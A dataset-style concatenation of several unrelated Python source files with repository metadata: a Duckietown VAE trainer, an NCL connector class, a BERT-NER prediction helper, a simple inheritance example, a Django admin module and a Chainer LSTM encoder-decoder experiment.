002d43df6b57bde48d6fb3e45f4ec7e76b5e5901 | bf0b6a4973f2c565e71fb3c0171ee2039464fa55 | /duckietown_rl/vae.py | abd23b158ece8ca81ee87d15f51cc7233499e464 | [] | no_license | duckieT/duckietown_rl_ddpg_vae | d891d5dc15bc05fbe2c0e5f4281beb363c660de1 | 739210584fb9a4028887a3e2d420a1b3686952b1 | refs/heads/master | 2020-04-18T06:42:09.426461 | 2018-11-14T06:03:19 | 2018-11-14T06:03:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,592 | py | from __future__ import print_function
import torch
from torch import nn, optim
from torch .nn import functional as F
from torchvision .utils import save_image
import numpy as np
# hyperparameters
input_image_size = (480, 640)
input_image_channels = 3
image_dimensions = input_image_channels * input_image_size [0] * input_image_size [1]
feature_dimensions = 1000
encoding_dimensions = 40
learning_rate = 1e-3
# test hyperparameters
test_reconstruction_n = 8
test_sample_n = 8
def thing ():
class thing (dict):
def __init__(self):
pass
def __getattr__(self, attr):
return self [attr]
def __setattr__(self, attr, val):
self [attr] = val
return thing ()
def params ():
import argparse
import os
import sys
parser = argparse .ArgumentParser (description = 'vae x ducks')
parser .add_argument ('--train', type = str, required = True, metavar = 'path', help = 'path to a folder containing training images for the vae')
parser .add_argument ('--test', type = str, default = None, metavar = 'path', help = 'path to a folder containing test images for the vae (default: training dataset)')
parser .add_argument ('--init', type = str, default = None, metavar = 'path', help = 'path to a trained model file for initializing training')
parser .add_argument ('--learning-rate', type = float, default = learning_rate, metavar = 'n', help = 'learning rate for adam (default: ' + str (learning_rate) + ')')
parser .add_argument ('--feature-dim', type = int, default = feature_dimensions, metavar = 'd', help = 'number of feature dimonsions (default: ' + str (feature_dimensions) + ')')
parser .add_argument ('--encoding-dim', type = int, default = encoding_dimensions, metavar = 'd', help = 'number of encoding dimensions (default: ' + str (encoding_dimensions) + ')')
parser .add_argument ('--batch-size', type = int, default = 10, metavar = 'n', help = 'batch size for training (default: 10)')
parser .add_argument ('--epochs', type = int, default = 10, metavar = 'n', help = 'number of epochs to train (default: 10)')
parser .add_argument ('--activation', type = str, default = 'relu', choices = ['relu', 'leaky_relu', 'selu'], metavar = 'a', help = 'activation function in the hidden layers (default: relu)')
parser .add_argument ('--log-interval', type = int, default = 10, metavar = 's', help = 'how many batches to wait before logging training status (default: 10)')
parser .add_argument ('--seed', type = int, default = 1, metavar = 's', help = 'random seed (default: 1)')
parser .add_argument ('--no-cuda', action = 'store_true', default = False, help = 'disables CUDA training')
parser .add_argument ('--out', type = str, default = None, metavar = 'path', help = 'path to a folder to store output')
parser .add_argument ('--out-model', action = 'store_true', default = False, help = 'output model_n.pt')
args = parser .parse_args ()
trainer_args = thing ()
trainer_args .train = args .train
trainer_args .test = args .test or args .train
trainer_args .learning_rate = args .learning_rate
trainer_args .batch_size = args .batch_size
trainer_args .epochs = args .epochs
trainer_args .log_interval = args .log_interval
trainer_args .seed = args .seed
trainer_args .cuda = not args .no_cuda and torch .cuda .is_available ()
trainer_args .init = args .init
trainer_args .out = args .out
trainer_args .out_model = args .out_model
model_args = thing ()
model_args .feature_dimensions = args .feature_dim
model_args .encoding_dimensions = args .encoding_dim
model_args .activation = args .activation
os .makedirs (trainer_args .out, exist_ok = True)
if os .listdir (trainer_args .out):
print ('Warning: ' + trainer_args .out + ' is not empty!', file = sys .stderr)
return trainer_args, model_args
def load_samples (path, cuda = True):
import os
import tempfile
from torch .utils .data import DataLoader
from torchvision import datasets, transforms
image_folder_path = tempfile .TemporaryDirectory () .name
os .makedirs (image_folder_path)
os .symlink (os .path .realpath (path), os .path .join (image_folder_path, 'data'))
cuda_args = {'num_workers': 1, 'pin_memory': True} if trainer_args .cuda else {}
return DataLoader (
dataset = datasets .ImageFolder (image_folder_path, transform = transforms .ToTensor ()),
batch_size = trainer_args .batch_size,
shuffle = True,
**cuda_args)
def out_file (filename):
import os
return os .path .join (trainer_args .out, filename)
def load_state ():
return torch .load (trainer_args .init) if trainer_args .init else {}
def save_state ():
torch .save ((
{ 'epoch': epoch
, 'rng': torch .get_rng_state ()
, 'model': model .state_dict ()
, 'optimizer': optimizer .state_dict () })
, out_file ('state_' + str (epoch) + '.pt'))
if trainer_args .out_model:
torch .save ({ 'model': model .state_dict () }
, out_file ('model_' + str (epoch) + '.pt'))
class VAE (nn .Module):
def __init__ (self, image_dimensions, feature_dimensions, encoding_dimensions, activation, **kwargs):
super (VAE, self) .__init__ ()
self .activation = activation
self.img_dim = image_dimensions
self.feat_dim = feature_dimensions
self.encode_dim = encoding_dimensions
self .fc1 = nn .Linear (image_dimensions, feature_dimensions)
self .fc21 = nn .Linear (feature_dimensions, encoding_dimensions)
self .fc22 = nn .Linear (feature_dimensions, encoding_dimensions)
self .fc3 = nn .Linear (encoding_dimensions, feature_dimensions)
self .fc4 = nn .Linear (feature_dimensions, image_dimensions)
self.device = torch .device ('cuda' if torch.cuda.is_available() else 'cpu')
def encode (self, x):
if(type(x) is np.ndarray):
x = x.reshape(-1, self.img_dim)
x = torch.from_numpy(x).type(torch.FloatTensor).to(self.device)
else:
x = x.view(-1, self.img_dim)
if self .activation == 'relu':
h1 = F .relu (self .fc1 (x))
elif self .activation == 'leaky_relu':
h1 = F .leaky_relu (self .fc1 (x))
elif self .activation == 'selu':
h1 = F .selu (self .fc1 (x))
else:
raise Exception ('unknown activation', self .activation)
return self .fc21 (h1), self .fc22 (h1)
def reparameterize (self, mu, logvar):
std = torch .exp (0.5 * logvar)
eps = torch .randn_like (std)
return eps .mul (std) .add_ (mu)
def decode (self, z):
if self .activation == 'relu':
h3 = F .relu (self .fc3 (z))
elif self .activation == 'leaky_relu':
h3 = F .leaky_relu (self .fc3 (z))
elif self .activation == 'selu':
h3 = F .selu (self .fc3 (z))
else:
raise Exception ('unknown activation', self .activation)
return torch .sigmoid (self .fc4 (h3))
def forward (self, x):
if(type(x) is np.ndarray):
x = x.reshape(-1, self.img_dim)
x = torch.from_numpy(x).type(torch.FloatTensor).to(self.device)
else:
x = x.view(-1, self.img_dim)
mu, logvar = self .encode (x)
z = self .reparameterize (mu, logvar)
return self .decode (z), mu, logvar
# Reconstruction + KL divergence losses summed over all elements and batch
def objective (recon_x, x, mu, logvar):
BCE = F .binary_cross_entropy (recon_x, x .view (-1, image_dimensions), reduction = 'sum')
# see Appendix B from VAE paper:
# Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014
# https://arxiv.org/abs/1312.6114
# 0.5 * sum (1 + log (sigma^2) - mu^2 - sigma^2)
KLD = -0.5 * torch .sum (1 + logvar - mu .pow (2) - logvar .exp ())
return BCE + KLD
def train (epoch):
model .train ()
total_train_loss = 0
for i, (batch_sample, _) in enumerate (train_sampler):
batch_sample = batch_sample .to (device)
optimizer .zero_grad ()
recon_batch, mu, logvar = model (batch_sample)
loss = objective (recon_batch, batch_sample, mu, logvar)
loss .backward ()
total_train_loss += loss .item ()
optimizer .step ()
if i % trainer_args .log_interval == 0:
print ('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}' .format
( epoch
, i * len (batch_sample)
, len (train_sampler .dataset)
, 100. * i / len (train_sampler)
, loss .item () / len (batch_sample)))
train_loss = total_train_loss / len (train_sampler .dataset)
print ('====> Epoch: {} Average loss: {:.4f}' .format (epoch, train_loss))
def test (epoch):
model .eval ()
total_test_loss = 0
with torch .no_grad ():
for i, (batch_sample, _) in enumerate (test_sampler):
batch_sample = batch_sample .to (device)
recon_batch, mu, logvar = model (batch_sample)
total_test_loss += objective (recon_batch, batch_sample, mu, logvar) .item ()
if trainer_args .out and i == 0:
test_batch_size = min (batch_sample .size (0), trainer_args .batch_size)
n = min (test_batch_size, test_reconstruction_n)
comparison = torch .cat (
[ batch_sample [:n]
, recon_batch .view (test_batch_size, input_image_channels, input_image_size [0], input_image_size [1]) [:n] ])
save_image (comparison .cpu (), out_file ('reconstruction_' + str (epoch) + '.png'), nrow = n)
test_loss = total_test_loss / len (test_sampler .dataset)
print ('====> Test set loss: {:.4f}' .format (test_loss))
if trainer_args .out:
encoding_sample = torch .randn (test_sample_n ** 2, model_args .encoding_dimensions) .to (device)
image_sample = model .decode (encoding_sample) .cpu ()
save_image (image_sample .view (test_sample_n ** 2, input_image_channels, input_image_size [0], input_image_size [1])
, out_file ('sample_' + str (epoch) + '.png'))
"""
trainer_args, model_args = params ()
torch .manual_seed (trainer_args .seed)
train_sampler = load_samples (trainer_args .train, trainer_args .cuda)
test_sampler = load_samples (trainer_args .test, trainer_args .cuda)
device = torch .device ('cuda' if trainer_args .cuda else 'cpu')
model = VAE (**model_args) .to (device)
optimizer = optim .Adam (model .parameters (), lr = trainer_args .learning_rate)
epoch_offset = 1
state = load_state ()
if 'rng' in state:
torch .set_rng_state (state ['rng'])
if 'model' in state:
model .load_state_dict (state ['model'])
if 'optimizer' in state:
optimizer .load_state_dict (state ['optimizer'])
if 'epoch' in state:
epoch_offset += state ['epoch']
for epoch in range (epoch_offset, epoch_offset + trainer_args .epochs):
train (epoch)
test (epoch)
if trainer_args .out:
save_state ()
"""
| [
"richielyl@hotmail.com"
] | richielyl@hotmail.com |
f1cea55677410e3239fb9b79ba0d8b8c3a11d14c | 190bd588ba4a5c69db4cb10382553e4ba013b301 | /ncl/causalconnector.py | 46e160ccde0311e545657ef0f59693833e4f8954 | [
"MIT"
] | permissive | MichaelBittencourt/NCL-Generator-API | 56bf7a480c4466b9e764bfe887ee196054c281eb | 8eecf2ea4948354fae9f64b68da2f24ad0663d60 | refs/heads/master | 2020-12-04T16:56:42.201088 | 2020-01-25T03:45:00 | 2020-01-25T02:06:06 | 231,844,836 | 1 | 1 | MIT | 2020-01-25T02:06:08 | 2020-01-04T23:54:08 | Python | UTF-8 | Python | false | false | 1,287 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2019 Michael Bittencourt <mchl.bittencourt@gmail.com>
#
# Distributed under terms of the MIT license.
"""
"""
from ncl.abstractelement import AbstractElement
from ncl.condition import Condition
from ncl.action import Action
from ncl.connectorparam import ConnectorParam
class CausalConnector(AbstractElement):
def __init__(self, id, condition, action):
listAttributes = ["id"]
listChildren = [Condition, Action, ConnectorParam]
super().__init__("causalConnector", listAttributes, listChildren)
self.set("id", id)
self.add(condition)
self.add(action)
def add(self, nclComponent):
if isinstance(nclComponent, Condition):
if len(self._getListChildren()[Condition]) > 0:
raise Exception("Is not possible add more of one Condition in CausalConnector")
if isinstance(nclComponent, Action):
if len(self._getListChildren()[Action]) > 0:
raise Exception("Is not possible add more of one Action in CausalConnector")
return super().add(nclComponent)
#TODO Still need setup logic to caudalConnector and need update tu user Condition when this class will created
pass
| [
"mchl.bittencourt@gmail.com"
] | mchl.bittencourt@gmail.com |
d705d8ae5e78e993dd20c7d1b1c4e43f687428c5 | 490ed3946708791a188c6f375b1986ba1fb7d386 | /build/lib/keras_bert_ner/utils/.ipynb_checkpoints/predict-checkpoint.py | 3efcaa50da311647a86771cd08b39325e51e3874 | [
"MIT"
] | permissive | gm19900510/keras-bert-ner | 123c40487b5a20d6be49b1d808a832ccd3d2a489 | 6b37b23623544e7e1ec59a0b12ac92bff2b69182 | refs/heads/master | 2020-09-01T12:11:13.456500 | 2019-10-31T09:50:24 | 2019-10-31T09:50:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import codecs
import pickle
import numpy as np
from keras.models import load_model
from ..bert4keras.layers import custom_objects
from ..bert4keras.utils import Tokenizer
from ..decode.viterbi import Viterbi
from keras_contrib.layers import CRF
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy
__all__ = ["build_trained_model", "get_model_inputs"]
custom_objects["CRF"] = CRF
custom_objects["crf_loss"] = crf_loss
custom_objects["crf_viterbi_accuracy"] = crf_viterbi_accuracy
def build_trained_model(args):
if args.device_map != "cpu":
os.environ["CUDA_VISIBLE_DEVICES"] = args.device_map
else:
os.environ["CUDA_VISIBLE_DEVICES"] = ""
token_dict = {}
with codecs.open(args.bert_vocab, "r", encoding="utf-8") as f:
for line in f:
token = line.strip()
token_dict[token] = len(token_dict)
tokenizer = Tokenizer(token_dict)
model = load_model(os.path.join(args.model_path, args.model_name), custom_objects=custom_objects)
with codecs.open(os.path.join(args.model_path, "id2tag.pkl"), "rb") as f:
id2tag = pickle.load(f)
viterbi_decoder = Viterbi(model, len(id2tag))
return tokenizer, id2tag, viterbi_decoder
def get_model_inputs(tokenizer, src_data, max_len):
tokens, segs = [], []
for item in src_data:
res = tokenizer.encode(item, first_length=max_len)
tokens.append(np.array(res[0]))
segs.append(np.array(res[1]))
return tokens, segs | [
"liushaoweihua@yiwise.com"
] | liushaoweihua@yiwise.com |
8944bf53f63bed3d9af9f46ea6448ceb52c8803e | 2c359d4e3a387040116cb983950605b4ee22d1f7 | /program/minh.py | ec4db9a48f4e8900b0c94f5acc171b07b34e69e2 | [] | no_license | VenkatProjects/Python | cd25adcadfcb2a3d3cd0263a68e7d9489c630741 | 652fd8f48c4ab5b494694c16e037daf4aa05d99b | refs/heads/master | 2023-02-03T22:40:25.915725 | 2023-01-27T06:37:50 | 2023-01-27T06:37:50 | 281,453,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 656 | py | class Person:
def __init__(self, name):
self.name = name
def sayName(self):
print("My name is : {}".format(self.name))
class Engineer(Person):
def __init__(self, name):
super().__init__(name)
self.profession = "Engineer"
def sayProfession(self):
print(self.profession)
class Doctor(Person):
def __init__(self, name):
super().__init__(name)
self.profession = "Doctor"
def sayProfession(self):
print(self.profession)
engineer = Engineer("venkat")
doctor = Doctor("poonga")
engineer.sayName()
engineer.sayProfession()
doctor.sayName()
doctor.sayProfession() | [
"esan1610@gmail.com"
] | esan1610@gmail.com |
8ea574857fbefb741c89a4bd87a9dd7d8dca56e0 | 0ff6198179fda1763acba69ff414c32e0f537233 | /papers/admin.py | a402aa0c0c52c85351602ea2b3aef87fbfe288fe | [
"CC0-1.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | jc11am/Lab-Website | 2a4d03f98f0502a2f77dacbbcd6db6714823cdab | 111e837c957e5c73022de366985aaa6e3b3d014c | refs/heads/master | 2021-05-16T22:54:04.790528 | 2016-09-10T19:28:37 | 2016-09-10T19:28:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | '''This package sets up the admin interface for the :mod:`papers` app.'''
from django.contrib import admin
from papers.models import Publication, AuthorDetails, AuthorContributions
class PublicationAdmin(admin.ModelAdmin):
'''The :class:`~papers.models.Publication` model admin is the default.'''
pass
admin.site.register(Publication, PublicationAdmin)
class AuthorDetailsAdmin(admin.ModelAdmin):
'''The :class:`~papers.models.AuthorDetails` model admin is the default.'''
pass
admin.site.register(AuthorDetails, AuthorDetailsAdmin)
class AuthorContributionsAdmin(admin.ModelAdmin):
pass
admin.site.register(AuthorContributions, AuthorContributionsAdmin) | [
"dave.bridges@gmail.com"
] | dave.bridges@gmail.com |
46e7c0ebfd167b48434b11d94b7ebaa0bb8cb136 | 2cad173dd3d6a378d805592eb71ce7261d5c3f98 | /Get Files From Directory Dynamically.py | 2c2c91a352b777dfe8c93333dd85c599f1ac5526 | [] | no_license | souravbanerjeewb/Code | b4ae2fd2d1157d98c5d01ad2c2e3fe5758f0a17e | bd1bcdc06a4b1a03c067cf34aeb6ae5000dc8732 | refs/heads/master | 2023-01-04T08:10:24.710146 | 2020-10-27T17:25:15 | 2020-10-27T17:25:15 | 112,154,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 221 | py | import glob, os
#*****Define the directory******
os.chdir("D:/Files")#***Change the directory as requered
#*****Loop to get the txt files and display the name
for file in glob.glob("*.txt"):
print(file)
| [
"noreply@github.com"
] | noreply@github.com |
8c650db903e4c481af2d57614db70fd99846e0d2 | 6ebb264379c41c8e22bf89bb482d56de1a2f2e50 | /tests/unit/test_sum.py | fe4cc3aa315276e8d4f493317f4ece75063ae710 | [] | no_license | axen22/unitTest3 | 864cce48660312398db3546382375f720e74b7ac | 38b9e7b37941def9c8a90665107b87a6579925a2 | refs/heads/master | 2020-07-28T07:04:10.491348 | 2019-09-18T15:43:33 | 2019-09-18T15:43:33 | 209,346,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | #another way to do this
#target = __import__("my_sum.py")
#sum = target.sum
import unittest
from fractions import Fraction
from my_sum import sum
class TestSum(unittest.TestCase):
def test_list_int(self):
"""
Test that it can sum a list of integers
"""
data = [1, 2, 3]
result = sum(data)
self.assertEqual(result, 6)
def test_list_fraction(self):
"""
Test that it can sum a list of fractions
"""
data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 4)]
result = sum(data)
self.assertEqual(result, 1)
def test_bad_type(self):
data = "banana"
with self.assertRaises(TypeError):
result = sum(data)
if __name__ == '__main__':
unittest.main() | [
"53572480+axen22@users.noreply.github.com"
] | 53572480+axen22@users.noreply.github.com |
75553f4f93558a9c446c561ab0cac78bb68102c8 | b232ab24686a197a88973f26478157d05c71a930 | /03. 파이썬 문자열/049.py | a0ff28c7508d71fb92da6f742be5fdf32d09267d | [] | no_license | areum0505/python300 | 09a3ea858bb728b6e2f699a57f013457680ab1d8 | e3b56bd653390172410b86e15c40f34ef3125787 | refs/heads/master | 2023-01-06T04:53:44.937116 | 2020-10-22T23:44:36 | 2020-10-22T23:44:36 | 288,321,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | # 다음과 같이 날짜를 표현하는 문자열이 있을 때 연도, 월, 일로 나눠보세요.
date = "2020-05-01"
date.split("-")
| [
"noreply@github.com"
] | noreply@github.com |
837f178ec38d14871743e1d84aa11312970b3087 | ae9f2d64c8d0fc711d426e80e41bbce158ab7a4e | /build/config.gypi | 8529efc74c687d82ee2470bca8a5e886d916f502 | [] | no_license | aitchkhan/Real-Time-Chat-with-Node-js | 2863c3b9a173d1807acd5696decb74f66ddd79a7 | 201b7c6126c28f09415699521b6401349bf5cee3 | refs/heads/master | 2021-01-23T16:40:01.118218 | 2015-11-08T12:46:42 | 2015-11-08T12:46:42 | 34,112,637 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_has_winsdk": "true",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "ia32",
"uv_library": "static_library",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"visibility": "",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\aitchkhan\\.node-gyp\\0.12.2",
"copy_dev_lib": "true",
"standalone_static_library": 1
}
}
| [
"aitchkhan@gmail.com"
] | aitchkhan@gmail.com |
65e893cd076a735f16f7fe5a29f4a839759724bc | 8dc333b7823c2cc5f4bb4adb75da37dcab06495f | /Section1.py | f0b657a08e18c2e71c97fe025deaf7856ec5a962 | [] | no_license | Mud-Fire/Math_Homework | cdb3c7729d7799a4ceeed2b506a239d305d5a608 | 119c26ab4c544e7652ac449661d2a39cd8b79480 | refs/heads/master | 2021-05-07T15:03:10.286846 | 2017-11-08T11:44:11 | 2017-11-08T11:44:11 | 109,968,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 12 12:53:13 2017
@author: zb
"""
#获取需要计算的项数
strN = input("Please enter an integer greater than 2:")
countN = int(strN)
#记录精确值
sumExact = 0.5 * (1.5-1/countN - 1/(countN+1))
#记录从小到大加法运算的和
sumOrder = 0
#记录从大到小加法运算的和
sumReOrder = 0
#每次循环的N值初始化
countNOrder = 2
countNReOrder = countN
if countN > 1:
#对N项进行循环相加
while countNOrder <= countN:
print(countNOrder,countNReOrder)
sumOrder += 1/(countNOrder**2-1)
sumReOrder += 1/(countNReOrder**2-1)
countNOrder += 1
countNReOrder -= 1
#对结果进行打印比较
print("===========result==================")
print("Order summation %f"%sumOrder)
print("Reverse order summation %f"%sumReOrder)
print("Exact Value %f"%sumExact)
else:
print("Please enter an integer greater than 2 ") | [
"noreply@github.com"
] | noreply@github.com |
10b624301331e971b74b1e971ab0f51ee36867b2 | 30bc1657a930cb90902a36c9e7e16e5d31ae2341 | /processDEM.py | dc3e54b92ab043e2dc05f0ffeec6c562a8882b1b | [] | no_license | Jubeku/DEM_processing | 26918dc620d216ebcd4ab9cbeb6763e87669c0fc | 0577dd5939ec4ea93bcada5faac6690feb8c0044 | refs/heads/master | 2020-08-26T16:59:03.106098 | 2019-10-29T16:01:04 | 2019-10-29T16:01:04 | 217,081,467 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,548 | py | #!/usr/bin/env python
"""
This script allows to repair, filter, and crop 2d DEM files.
Input parameters have to be specified in a file named 'input.txt'.
"""
import numpy as np
from modules.classTopo import Topo
from modules.m_PLOTS import plotDEM
def main():
### INPUT
# Read input parameter
with open('input.txt') as f:
lines = f.readlines()
k1, k2 = map(np.float,lines[1].split())
E0out, E1out = map(np.float,lines[3].split())
N0out, N1out = map(np.float,lines[5].split())
dxout, dyout = map(np.float,lines[7].split())
repair_bool = lines[ 9].replace('\n', '')
fileID = lines[11].replace('\n', '')
outID = lines[13].replace('\n', '')
# Read DEM file
with open(fileID) as f:
lines = f.readlines()
Nx, Ny = map(np.int,lines[1].split())
E0, E1 = map(np.float,lines[2].split())
N0, N1 = map(np.float,lines[3].split())
tmin,tmax = map(np.float,lines[4].split())
topo = np.loadtxt(lines,skiprows=5)
# Determine resolution of DEM file
dx = (E1-E0)/(Nx-1)
dy = (N1-N0)/(Ny-1)
xi = np.arange(0, dx*Nx+dx, dx)
yi = np.arange(0, dy*Ny+dy, dy)
print('\n Grid dimension and resolution.')
print('Nx: ', Nx, ', Ny: ', Ny)
print('dx: ', dx, ', dy: ', dy)
# Creat object with Topo class
topo = np.flipud(topo)
topoC = Topo(topo, E0, N0, dx, dy, Nx, Ny)
### PROCESSING
# Filtering
if k1 == 0.:
print('\n No filtering.')
else:
topoC.filter( k1, k2 )
# Cropping
if ( E0out == E0 and E1out == E1 and N0out == N0 and N1out == N1 ):
print('\n No cropping.')
else:
topoC.crop( E0out, E1out, N0out, N1out )
# Interpolating
if ( dxout == dx and dyout == dy ):
print('\n No interpolation.')
else:
topoC.interpolate( dxout, dyout )
# Repairing
if repair_bool == 'True':
topoC.repair()
### PLOTTING
topoC.plot( 'Processed DEM' )
### WRITING
with open(outID, 'w') as f:
f.write('DSAA\n')
f.write(' '+str(topoC.Nx)+' '+str(topoC.Ny)+'\n')
f.write(' '+str(E0out)+' '+str(E1out)+'\n')
f.write(' '+str(N0out)+' '+str(N1out)+'\n')
np.savetxt(f,(np.min(topoC.topo),np.max(topoC.topo)),
fmt=' %.1f',newline='')
f.write('\n')
np.savetxt(f, np.flipud(topoC.topo), fmt='%.3f', delimiter=' ')
if __name__ == "__main__":
main()
| [
"julian.b.kuehnert@gmail.com"
] | julian.b.kuehnert@gmail.com |
65aad1bfe5b4d4756f2c8145c69dbdeaceda54b0 | 061fbd9e1d9bed1c88d5660211e9172401d5c108 | /venv/bin/easy_install | e3a56dc6a003370abaaa757ad43060e0d5c2f3fd | [] | no_license | PrachiJani13/mypythonproject | 5838302f1b9dd433dd9daf248f51d012072f7eaf | 3aa81e5d1175f4f369e49eb0faee046ee1668b1c | refs/heads/master | 2020-09-17T11:08:07.125757 | 2019-11-26T02:35:00 | 2019-11-26T02:35:00 | 224,083,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | #!/Users/prachijani/workspace/myprojectpython/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"prachi.jani@sjsu.edu"
] | prachi.jani@sjsu.edu | |
4db5502b3cb8b1723df8a7ac89467e02e213fda7 | d83f50302702d6bf46c266b8117514c6d2e5d863 | /counting-bits.py | f875bfed4d8a2d111f435b9c52cfced316a0c179 | [] | no_license | sfdye/leetcode | 19764a6bdb82de114a2c82986864b1b2210c6d90 | afc686acdda4168f4384e13fb730e17f4bdcd553 | refs/heads/master | 2020-03-20T07:58:52.128062 | 2019-05-05T08:10:41 | 2019-05-05T08:10:41 | 137,295,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
ones = [0] * (num + 1)
for i in range(1, num + 1):
ones[i] = ones[i & (i - 1)] + 1
return ones
| [
"tsfdye@gmail.com"
] | tsfdye@gmail.com |
d0e81ba6dd79dc29f6b5cd9958451e5b589b5712 | 66c723d0137c0de9fdfc4a90d3405a8b3c60a7bd | /n_step_lstm/n_step_lstm.py | cc632b6a6ca0f68a32b0e7c8f828d8f30373bd32 | [] | no_license | afcarl/test-chainer-performance | 5ccb1d451791dd96633a1bb0f7e9438688f006ad | e0802e8421f4a07b839c44ceb90cfdf188ec4b84 | refs/heads/master | 2020-03-16T11:27:36.202733 | 2017-02-21T07:21:45 | 2017-02-21T07:21:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,796 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import chainer
import numpy as np
# 長さ順にソートしておく
x1 = chainer.Variable(np.array([0, 1, 2, 3, 4], dtype=np.int32))
x2 = chainer.Variable(np.array([4, 5, 6], dtype=np.int32))
x3 = chainer.Variable(np.array([4, 5], dtype=np.int32))
x_data = [x1, x2, x3]
batchsize = len(x_data)
x_dataset = chainer.functions.transpose_sequence(x_data)
# Auto-encoderの場合
y_data = x_data[:]
y_dataset = chainer.functions.transpose_sequence(y_data)
vocab_size = 2000
n_units = 200
embedding_size = 200
embID = chainer.links.EmbedID(vocab_size, embedding_size)
embID_decoder = chainer.links.EmbedID(vocab_size, embedding_size)
# lstm = chainer.links.LSTM(in_size=10, out_size=10)
encoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
decoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
output_layer = chainer.links.Linear(n_units, vocab_size)
x_len = len(x_dataset[0])
# c, h は初期化するべき
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h_list = []
for i, x in enumerate(x_dataset):
print "-" * 10
x = embID(x)
x_len = x.data.shape[0]
h_len = h.data.shape[0]
print "x_len:", x_len
print "h_len:", h_len
if x_len < h_len:
h, h_stop = chainer.functions.split_axis(h, [x_len], axis=0)
c, c_stop = chainer.functions.split_axis(c, [x_len], axis=0)
# 処理済みのhをリストに追加
h_list.append(h_stop)
print "h:", h.data.shape
print "c:", c.data.shape
c, h = encoder_lstm(c, h, x)
# print h.data
h_list.append(h)
# appendの順番的にリバースしておいた方が自然?
h_list.reverse()
h_encoded = chainer.functions.concat(h_list, axis=0)
print h_encoded.data.shape
# print h_encoded.data
def _make_tag(_batchsize, tag=0):
shape = (_batchsize,)
return np.full(shape, tag, dtype=np.int32)
x_len = len(x_dataset[0])
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
# h = chainer.Variable(np.zeros((x_len, out_size), dtype=np.float32))
h = h_encoded
start_tag = _make_tag(batchsize, tag=0)
start_tag = [chainer.Variable(start_tag)]
end_tag = _make_tag(batchsize, tag=1)
end_tag = [chainer.Variable(end_tag)]
# y = start_tag
decode_start_idx = 0
# decode
# y_datasetは<s>で始まる前提にする?
# ミニバッチ化する時に<eos>の扱いが面倒なので、データの前処理のときに
# [0, 1, 2, 3, <eos>]
# [0, 3, <eos>]
# [0, 1, 2, <eos>]
# とするほうが良さげ
y_dataset = list(y_dataset)
# for target in y_dataset:
for y, t in zip(start_tag + y_dataset[:-1], y_dataset[1:]):
print "-" * 10
y_embedding = embID(y)
# y_len = y_embedding.data.shape[0]
y_len = y_embedding.data.shape[0]
# t_len = t.data.shape[0]
h_len = h.data.shape[0]
target_len = t.data.shape[0]
# print t
# print t_len
print "y_len:", y_len
print "target_len:", target_len
if target_len < h_len:
h, h_stop = chainer.functions.split_axis(h, [target_len], axis=0)
c, c_stop = chainer.functions.split_axis(c, [target_len], axis=0)
if target_len < y_len:
y_embedding, _stop_y_embedding = chainer.functions.split_axis(y_embedding, [target_len], axis=0)
print "y_embedding:", y_embedding.data.shape
print "h:", h.data.shape
c, h = encoder_lstm(c, h, y_embedding)
predict = output_layer(h)
print "predict:", predict.data.shape
print h
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
# embID_decoder()
# loss = functions.softmax_cross_entropy(y, t)
